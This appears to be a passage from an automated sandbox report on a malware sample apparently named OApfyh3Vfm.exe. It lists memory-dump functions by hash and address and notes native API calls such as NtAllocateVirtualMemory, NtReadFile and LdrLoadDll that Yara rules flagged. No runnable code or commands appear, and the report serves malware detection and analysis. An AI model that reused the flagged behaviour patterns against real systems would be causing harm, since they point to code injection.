                                            • Opcode Fuzzy Hash: 8622bcfac04b13a902ce4a32e5a08b13005a0c951d847cc4609f558c12334c4e
                                            • Instruction Fuzzy Hash: 91211478D05218DFDB10DFA5D488B9DBBF1FB08366F108469D811E721ADB789885DF00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED745, Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ec8d66116c61506b8c3ec972e5364d7a946cc09a7d6dc6dda560f42af45ff26
                                            • Instruction ID: eb388db1cb09fd6d44876b94f23df86cbc684155b55f3f6a20c29484340f94ed
                                            • Opcode Fuzzy Hash: 3ec8d66116c61506b8c3ec972e5364d7a946cc09a7d6dc6dda560f42af45ff26
                                            • Instruction Fuzzy Hash: AC012B714087D49AE7104F26CC84B67BBACFF42738F18C51AED159B246D7789C48C6B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 057523A8, Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf826af80cf3e4a01ff93eeee8e5c4315b7e6f3a502ed918fccb29e2bdec98e9
                                            • Instruction ID: 2090e6f67dad3cfefbb4ddc77571c271e80686166cf7e691bf8383b34fc26604
                                            • Opcode Fuzzy Hash: cf826af80cf3e4a01ff93eeee8e5c4315b7e6f3a502ed918fccb29e2bdec98e9
                                            • Instruction Fuzzy Hash: 56110774D00229CFDB60DFA1D848BADB7B1FB48391F1086AAD90AE3245DB745E85DF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED744, Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a990e3dfcc011d48d58fe9aa7e3b95f999103e20f26be97cd7515378425aec95
                                            • Instruction ID: fdfac92e56fe0e770ab23f3bf377a2e8c0d36f3d61942e8158783b2996bb29a5
                                            • Opcode Fuzzy Hash: a990e3dfcc011d48d58fe9aa7e3b95f999103e20f26be97cd7515378425aec95
                                            • Instruction Fuzzy Hash: 15F06271408384AAEB108F16DC84B62FBA8FF42734F18C45AED085B286C3799C48CAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575F590, Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2ca09b842b6468f6a0f6865e98b9a23a7cf798e45d69c9eb7546738797c45a9
                                            • Instruction ID: 556f3299258b506a4482a3f5d5344143929ef27581ee7be5759e131d73de796c
                                            • Opcode Fuzzy Hash: e2ca09b842b6468f6a0f6865e98b9a23a7cf798e45d69c9eb7546738797c45a9
                                            • Instruction Fuzzy Hash: 34F017B0E00219DFDB44DFAAD8457AFBBF9FB48315F1085AAC819E3204E7748A419F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575FB28, Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d68ae6374397f4b86bd40e97ad74e466b6df15a16d7a2dd4b948d0ccb0aa925
                                            • Instruction ID: afc2f8c50812ce260b536109e22333807da43259e1d0daa52ce0c90d5c9b340b
                                            • Opcode Fuzzy Hash: 7d68ae6374397f4b86bd40e97ad74e466b6df15a16d7a2dd4b948d0ccb0aa925
                                            • Instruction Fuzzy Hash: B9F067B0D04208DFCB04EFA9D9046AEFBFAFB08310F008AA6D81893244E7708A40EE40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575F530, Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66e38242324ba8b8dcbf5595ca45482753ead0d2f865af225247b3f2a6bc1e9d
                                            • Instruction ID: 34e2fea11b29cd7fdadb139a3f303eb5c916136973e98f70d4deb385ce1fed50
                                            • Opcode Fuzzy Hash: 66e38242324ba8b8dcbf5595ca45482753ead0d2f865af225247b3f2a6bc1e9d
                                            • Instruction Fuzzy Hash: 07F0FEB0E04249DFD744DFBA948479EBBF9EB48615F14C5A9D818D3244EB7489409F00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575F4D0, Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c04c2c266582a3619561cb97b7a183a38f71ab4c092d290d7acd90f36b65e832
                                            • Instruction ID: 2f1fb5b6ea17c0a695a02acfb082050a594672444205eda5075e2256e83e9a13
                                            • Opcode Fuzzy Hash: c04c2c266582a3619561cb97b7a183a38f71ab4c092d290d7acd90f36b65e832
                                            • Instruction Fuzzy Hash: 3CF0F8B0E05209EFDB50DFAAD44979EFBF9EB44615F1081AAC808D3240E7748A40DF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05753028, Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f99f74a0cfbd577297689cb1c277c7ff600788168a3f3d87857ba4b534153797
                                            • Instruction ID: 19b4de070b72305a001369c15012dffa9a1ef95048790bf01d9c7a260c6082b0
                                            • Opcode Fuzzy Hash: f99f74a0cfbd577297689cb1c277c7ff600788168a3f3d87857ba4b534153797
                                            • Instruction Fuzzy Hash: 4BF0F830E01208EFDB40DFAAD44569EFBFAEB45A55F00C5AAC808D3210EB749A41AF00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 057598D0, Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b176052a90f4d9e83df6d4e4962eeda783d7e411c5edf9fa00067242cfeddf7
                                            • Instruction ID: 66b3730cabfce1b866a47b0a1041a6ec79446aff89463b1c856d328069b519e8
                                            • Opcode Fuzzy Hash: 7b176052a90f4d9e83df6d4e4962eeda783d7e411c5edf9fa00067242cfeddf7
                                            • Instruction Fuzzy Hash: 96F01C70E05208EFDB80DFBAD44979EFBF9EB45615F0081A9C918D3250E7749A80EF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750879, Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1eeeddeef7cd2a9830a55d16c29385dfb448980e33ecc6c1c985140c586da011
                                            • Instruction ID: 32eeb04d9688548da333d89b21eba526c8977fa6abb33e91634ee183098d3b59
                                            • Opcode Fuzzy Hash: 1eeeddeef7cd2a9830a55d16c29385dfb448980e33ecc6c1c985140c586da011
                                            • Instruction Fuzzy Hash: 46F0F874D0B208EFC711DFA4A849AEDBBB4EB49310F1145DAD80993251EA341A56DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750D40, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c431e3c6d699f7690f1f91b121dc79bce7df174579fab7807ec88edb5650b7f4
                                            • Instruction ID: 2b55431ab181b071e959f721a399a4236d330f844f24302579753e361175ca87
                                            • Opcode Fuzzy Hash: c431e3c6d699f7690f1f91b121dc79bce7df174579fab7807ec88edb5650b7f4
                                            • Instruction Fuzzy Hash: 94F06D38916208DFC750DFA4E4C96DDBBB4EF09310F2150E9C808C7312E6355E46CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750CF7, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7a62c5dd3e0dfb63f28087c6e3eccb3892cb2590d658d6f6c4287b012d7422b
                                            • Instruction ID: 104ac7dd9651c1d277f7090d209a0f89a729a0c00d15820dac69b8a4c66d2078
                                            • Opcode Fuzzy Hash: f7a62c5dd3e0dfb63f28087c6e3eccb3892cb2590d658d6f6c4287b012d7422b
                                            • Instruction Fuzzy Hash: 79E06D3080A319EFC740DFB4A9896EE7BB4EB46200F2014A99808E3201EA710A8ADB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752EF0, Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9009db01c35b68b2ef70b69ad515d174e2533920cf13ec59e29265b4e9412a97
                                            • Instruction ID: 4660346be3facf5042cf38b46fd46a394313166ca9e12e3a2f3503f3ef833047
                                            • Opcode Fuzzy Hash: 9009db01c35b68b2ef70b69ad515d174e2533920cf13ec59e29265b4e9412a97
                                            • Instruction Fuzzy Hash: 17E0DF70602205DBD700CBBAE9087ABB6EEEF05366F0488A0E809C3081EB708940AE50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752308, Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20e9d3fd1217e48038e89122c9975ef6f7de2b2401127f06d9f7eb8c3429c53e
                                            • Instruction ID: 5aa147457fcfc0dc277b9bcafae0d83946421f4b04c082118308a1d2f83d50ec
                                            • Opcode Fuzzy Hash: 20e9d3fd1217e48038e89122c9975ef6f7de2b2401127f06d9f7eb8c3429c53e
                                            • Instruction Fuzzy Hash: 32E01A74E05208EFCB05DFE8D4406DEBBB9FB49310F1080A9D808A3300E7369A91EF80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752778, Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ade29a58a68a763d1bacc2b3b7cdba97ca5c52a858df55e542997f73e689a8ed
                                            • Instruction ID: 74599d7553b4e522d88c94fbcab449a1484fd407d3d8a2866a064543fb4c3b0a
                                            • Opcode Fuzzy Hash: ade29a58a68a763d1bacc2b3b7cdba97ca5c52a858df55e542997f73e689a8ed
                                            • Instruction Fuzzy Hash: B8F0F878E00228DFEB60DF61D848B98B7B2FB44341F108195D94DE3256CB745E85DF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750888, Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e3d186509bbfe533be1b35c0fcc91066975c5e57b62393f60909ffd06722099
                                            • Instruction ID: 557ba67fbebe644358db809947e58e6e8dee10dc8c84b468b9c06a074680af22
                                            • Opcode Fuzzy Hash: 6e3d186509bbfe533be1b35c0fcc91066975c5e57b62393f60909ffd06722099
                                            • Instruction Fuzzy Hash: 3FE01274D06208DFC700DFA4D84869DBBB4EB48310F1080A5880893300EB342E51DF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750D50, Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55d05747046ebfcb82f1ea6d72330d5dcd778af714f561e5c60427c0a78eb1ef
                                            • Instruction ID: ed8a1aada3a5f310ba9b95e930e3b060ddc36451031fecee14e8aa4fd3c56fa4
                                            • Opcode Fuzzy Hash: 55d05747046ebfcb82f1ea6d72330d5dcd778af714f561e5c60427c0a78eb1ef
                                            • Instruction Fuzzy Hash: EBE0BF38915618DFC750DFA8D449A9DBBF8EB08715F6040E9DC0997351E671AE40DB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750D08, Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82b352037f354ecbb2c023e4502d3842bfaf391073e3dab9ec332cbeafae24a0
                                            • Instruction ID: f7d15c9b6158f3b8a96be8e88c4cf38f6f7b2a434f46fd03a8886ba20db50076
                                            • Opcode Fuzzy Hash: 82b352037f354ecbb2c023e4502d3842bfaf391073e3dab9ec332cbeafae24a0
                                            • Instruction Fuzzy Hash: 8CE0EC34D1A21DDFC744DFF8D9496EEBBB8AB05214F2001A98C08A3240EB715A819B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752EEC, Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e676751dcdd39c957b15fd1599a93f34a80c21e7325705da6f86bc6d6ff07b93
                                            • Instruction ID: 7e799fc668ec33574448290887f93f086a61ed74018db109c8aeab2e781fb7ac
                                            • Opcode Fuzzy Hash: e676751dcdd39c957b15fd1599a93f34a80c21e7325705da6f86bc6d6ff07b93
                                            • Instruction Fuzzy Hash: FFD0A578115105DBC310DF75B40C7773AACD707256F005DD4DC09C3181F6708401BD51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 057527D5, Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e7e21aac341391db24d6a57c968b819ed46b1b187c7593df7379028e32cb9f8
                                            • Instruction ID: 72df061153720db4de78486e399cc2c8ef9c4c5494fb162482d57caa6f2fc9a9
                                            • Opcode Fuzzy Hash: 5e7e21aac341391db24d6a57c968b819ed46b1b187c7593df7379028e32cb9f8
                                            • Instruction Fuzzy Hash: 24D05E34D0421DCFEB64DF94D0896DCB772FB00314F108695D609D2106CB749E85EF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05755309, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10821014ad77aa61e68f7d890c67775913c6bf98f0194361bc3797c3afac354f
                                            • Instruction ID: 9a19c7344abb07e6adf1a195278a8ee1013186c887dbdc0052653ec9b56510b7
                                            • Opcode Fuzzy Hash: 10821014ad77aa61e68f7d890c67775913c6bf98f0194361bc3797c3afac354f
                                            • Instruction Fuzzy Hash: 11C04C74924114CBC715CF14D9A46A87779FB49352F0005D4A90E62141D7701F80DE45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00C7E598, Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4db83062fea38eb2b0d81fe4226e35799822cff3333b229c14e75ec0232d5573
                                            • Instruction ID: cbafe66c8f52b320d6cc96f104ea42588d32f84e60e82b0562a4a69258a182bc
                                            • Opcode Fuzzy Hash: 4db83062fea38eb2b0d81fe4226e35799822cff3333b229c14e75ec0232d5573
                                            • Instruction Fuzzy Hash: 7512A1F1C91746CBFB18DF65E9981893BA1B74432CBD04B08D2612EAD2D7B8116ECF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7C154, Relevance: .3, Instructions: 265COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 343059d56258144525eb345464306c0052f7b3cbfe997dd8d7e5b3d07e2696f5
                                            • Instruction ID: dece3f27578776d0ab88c34a27f05cf92534f77e04af8fe6629047b581373dd2
                                            • Opcode Fuzzy Hash: 343059d56258144525eb345464306c0052f7b3cbfe997dd8d7e5b3d07e2696f5
                                            • Instruction Fuzzy Hash: 88A13F32E0021A8FCF05DFB5C88459DBBB2FF85304B15856AE91ABB261EB31A955DF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05750040, Relevance: .2, Instructions: 242COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4dce2ddca2fb5da126f758c1b36e84f24f1963551f8fc7f2d76587bc57db5881
                                            • Instruction ID: b6c6b84565ac557ec36fe4f39548b23bef7f3c7a06160fc4558562d7aa0b9adb
                                            • Opcode Fuzzy Hash: 4dce2ddca2fb5da126f758c1b36e84f24f1963551f8fc7f2d76587bc57db5881
                                            • Instruction Fuzzy Hash: B5A1C274D0421CCFEF24CFA5C988BAEBBB2BF49314F148069D809A7251DBB46986DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7E588, Relevance: .2, Instructions: 223COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f552d370a23761fcd4173ca10fde8da8ea156dd927a30981a080d7b8dfcf098
                                            • Instruction ID: 81106dc981e8b5ddc7326ddad78ea633d29ce86160d29227c955647c5d15c32d
                                            • Opcode Fuzzy Hash: 5f552d370a23761fcd4173ca10fde8da8ea156dd927a30981a080d7b8dfcf098
                                            • Instruction Fuzzy Hash: 46C107B1C91745CBEB18DF65E8881893B71BB8532CF914B08D2616FAD2DBB4106ECF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05753530, Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2981f23f21eb02882ac41c8f1da8c6622b2f8115de920fc14ebe8408d941bd2
                                            • Instruction ID: a4838fc8d034d62d48f146426c27697facb4bb85cf31ee8e186ad6a3738cffc5
                                            • Opcode Fuzzy Hash: f2981f23f21eb02882ac41c8f1da8c6622b2f8115de920fc14ebe8408d941bd2
                                            • Instruction Fuzzy Hash: 785181B1E016588BEB18CF6BCD4078EFAF7AFC5200F18C5BA890CA7215EB7049859F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575352E, Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e89a9de2e84d0df2dd31b0bebd20b04e4f3e0a88b7c09827347fb37daf252bd0
                                            • Instruction ID: d6d9d1d63cbfd1a8f958b9d42cffece3c361eb98c732cf765da9b5add6f5d537
                                            • Opcode Fuzzy Hash: e89a9de2e84d0df2dd31b0bebd20b04e4f3e0a88b7c09827347fb37daf252bd0
                                            • Instruction Fuzzy Hash: F74163B1E016588BEB1CCF6BCD4068EFAF7AFC5200F14C5BA890DAA215DB7045458F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05759C50, Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46e6333c934246bbf410ab4a5df3c4d4c5076aa4e1f2a0a6e7e0a782d1b9fa07
                                            • Instruction ID: 3c651645a06116614cebe4d3992065e2c1a41ca0c1dbea53a5fd89a00e71e149
                                            • Opcode Fuzzy Hash: 46e6333c934246bbf410ab4a5df3c4d4c5076aa4e1f2a0a6e7e0a782d1b9fa07
                                            • Instruction Fuzzy Hash: 19414671E05A589BEB5DCF6B8C4069EFAF7AFC8301F18C1B9C90DAA224DB7046459F11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: OApfyh3Vfm.exe PID: 2908 Parent PID: 6332 OApfyh3Vfm.exeCOMMON

                                            Executed Functions

                                            Function 0041866E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1:A$r=A$r=A
                                            • API String ID: 2738559852-4243674446
                                            • Opcode ID: 94750a081ea5df0b42dff0cfba37f59e2559672dc67f1e5ce506d1bcc3b3793f
                                            • Instruction ID: f98354709d6c0bc9065ca04a702ec206925ddc2625e3f65bcad72d1d909c8930
                                            • Opcode Fuzzy Hash: 94750a081ea5df0b42dff0cfba37f59e2559672dc67f1e5ce506d1bcc3b3793f
                                            • Instruction Fuzzy Hash: 15F0F4B2200108AFCB14CF99CC80EEB77A9AF8C354F15824CFE0DA7241C630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418670, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1:A$r=A$r=A
                                            • API String ID: 2738559852-4243674446
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: f9e3a3d0e989e08c3f59baf01a417991646d82ee4afc000ab6c713d5a761e92c
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 12F0F4B2200208ABCB04DF89CC80EEB77ADAF8C714F018248BA0D97241C630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction ID: 122e155802c76e8fe71ecbd5f026ee28347fd4ee7a5d85f817b14445866b07dd
                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction Fuzzy Hash: 55014CB5D0020DBBDF10DAA1EC42FDEB378AB54318F0441AAE908A7281F634EB54CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004185C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041860D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 8eb6fbd051b3d6e3bdc80b0b17e8b32b36fddcadecc1da7b7e8bd51c52942836
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: 9DF0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041879A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: abb91b7e97b40279af1dee3f3751010f94b9b31f273ceb7b626929d5acdc0d5e
                                            • Instruction ID: 96809981d0a8fdf79ce76753a0317329ab16421fa70edbcd0fc906dabbcec608
                                            • Opcode Fuzzy Hash: abb91b7e97b40279af1dee3f3751010f94b9b31f273ceb7b626929d5acdc0d5e
                                            • Instruction Fuzzy Hash: 7CF0F8B2610218BFDB14DF99CC81EEB77ADEF88354F118559FE09A7241C634E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004187A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 25d322934daf616d54f73205e359e97dd0d0108bb283116572f6f6fe365e7cad
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
